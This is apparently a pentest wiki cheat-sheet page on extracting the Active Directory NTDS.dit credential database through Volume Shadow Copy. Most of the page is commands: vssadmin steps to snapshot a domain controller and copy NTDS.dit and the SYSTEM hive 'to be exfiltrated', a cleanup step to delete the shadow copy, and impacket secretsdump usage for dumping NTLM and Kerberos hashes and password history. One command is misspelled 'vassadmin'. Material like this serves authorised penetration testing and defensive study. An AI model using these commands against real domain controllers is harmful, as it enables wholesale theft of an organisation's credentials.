Volume Shadow Copy

Volume Shadow Copy (VSS) is a feature in Windows that allows for the creation of snapshots, or shadow copies, of files and volumes on a Windows system. These snapshots can be used for backup and recovery purposes and provide a point-in-time copy of files, including the NTDS.dit database.

Use the built-in command-line tool vssadmin to obtain backups of NTDS.dit and the SYSTEM file containing the Boot Key required to decrypt NTDS.dit.

vssadmin should be run from the command line on a Domain Controller

Exploit

Linux

secretsdump.py [domain/username]<:password> <options> -use-vss

OPTIONS
-just-dc                    Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm               Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username]    Extract Only NTDS.dit Data For Specified User
-user-status                Display If The User Is Disabled
-history                    Dump Password History
-outputfile                 Base Output Filename

-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File

Windows

## Create A Shadow Copy Of The C Drive
vssadmin create shadow for /for=C:

## Copy The NTDS.dit And SYSTEM Hive From The Shadow Copy To Be Exfiltrated
copy [ShadowCopyName]\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
copy [ShadowCopyName]\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save

## Delete The Shadow Copy We Created To Clean Up A Bit
vassadmin delete shadows /shadow=[ShadowCopyID]

Linux

## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -ntds ntds.dit.save -system system.save LOCAL

PreviousDCSync NextNTDSUtil

Last updated 1 year ago